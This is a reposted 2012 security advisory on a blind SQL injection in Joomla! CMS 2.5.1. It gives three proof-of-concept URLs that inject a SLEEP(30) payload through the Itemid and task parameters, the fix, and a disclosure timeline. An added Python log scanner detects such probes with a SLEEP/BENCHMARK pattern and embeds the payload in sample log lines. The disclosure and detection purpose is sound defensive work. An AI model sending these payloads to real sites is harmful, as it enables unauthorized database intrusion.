Sunday, April 29, 2012

Joomla! CMS 2.5.1 Blind SQL Injection Vulnerability

Description
Joomla! is a free and open source content management system (CMS) for publishing content on the World Wide Web and intranets and a model–view–controller (MVC) Web application framework that can also be used independently.

Stratsec vulnerability researcher Sow Ching Shiong has discovered a Blind SQL Injection vulnerability in Joomla! CMS. This issue was discovered in a default installation of Joomla! CMS 2.5.1. Earlier versions may also be affected.

Proof of concept URLs which will cause a time delay of 30 seconds are provided below:
  • http://[target]/[path]/index.php/using-joomla/extensions/components/search-component/smart-search?Itemid=466&option=1&q=3&searchword=Search...&task=search'%2b(SELECT 1 FROM (SELECT SLEEP(30))A)%2b'
  • http://[target]/[path]/joomla/index.php?Itemid=%27%2b(SELECT%201%20FROM%20(SELECT%20SLEEP(30))A)%2b%27
  • http://[target]/[path]/joomla/index.php?option=1&searchword={searchTerms}&Itemid='%2b(SELECT 1 FROM (SELECT SLEEP(30))A)%2b'

Solution
Update to version 2.5.2 or later.
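
To check web server access logs for requests shaped like the proof-of-concept URLs above, the following is an added example (not part of the original advisory and not Joomla! code). It assumes combined-format log lines; the function names, heuristics and sample log entries are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Itemid is a Joomla! menu item id, so a legitimate value is an integer.
NUMERIC_PARAMS = {"Itemid"}
# Parameters the advisory's proof-of-concept URLs inject into.
WATCHED_PARAMS = {"Itemid", "task"}
# MySQL time-delay functions typical of blind SQL injection probes.
DELAY_RE = re.compile(r"\b(sleep|benchmark)\s*\(", re.IGNORECASE)
# Request URI inside a combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample entries; the payload is the URL-encoded one from the advisory.
PAYLOAD = "%27%2b(SELECT%201%20FROM%20(SELECT%20SLEEP(30))A)%2b%27"
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Mar/2012:10:00:01 +0000] '
    '"GET /joomla/index.php?option=com_content&Itemid=466 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Mar/2012:10:00:07 +0000] '
    f'"GET /joomla/index.php?Itemid={PAYLOAD} HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Mar/2012:10:00:40 +0000] '
    f'"GET /joomla/index.php/smart-search?Itemid=466&q=3&task=search{PAYLOAD} HTTP/1.1" 200 5120',
]

def inspect_request(uri):
    """Return (parameter, reason) findings for one request URI."""
    findings = []
    for name, value in parse_qsl(urlsplit(uri).query, keep_blank_values=True):
        if name in NUMERIC_PARAMS and value and not (value.isascii() and value.isdigit()):
            findings.append((name, "non-numeric value"))
        if DELAY_RE.search(value):
            findings.append((name, "SQL delay function"))
        elif name in WATCHED_PARAMS and "'" in value:
            findings.append((name, "single quote"))
    return findings

def scan_log(lines):
    """Return (line_number, uri, findings) for every suspicious log entry."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match:
            findings = inspect_request(match.group(1))
            if findings:
                hits.append((number, match.group(1), findings))
    return hits

if __name__ == "__main__":
    for number, uri, findings in scan_log(SAMPLE_LOG):
        print(f"line {number}: {findings} <- {uri}")
```

A hit shows that a probe was sent, not that it succeeded; whether the site was exposed depends on the Joomla! version running at the time of the request.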

References

Vendor URL: http://developer.joomla.org/security/news/391-20120301-core-sql-injection.html
Stratsec: http://www.stratsec.net/Research/Advisories/Joomla-CMS-Blind-SQL-Injection-(SS-2012-004)

Disclosure Timeline
2012-02-29 - Vulnerability discovered.
2012-02-29 - Vulnerability reported to vendor.
2012-03-01 - Vendor acknowledged and confirmed the vulnerability.
2012-03-05 - Patch released.
2012-03-19 - Advisory published by Stratsec.
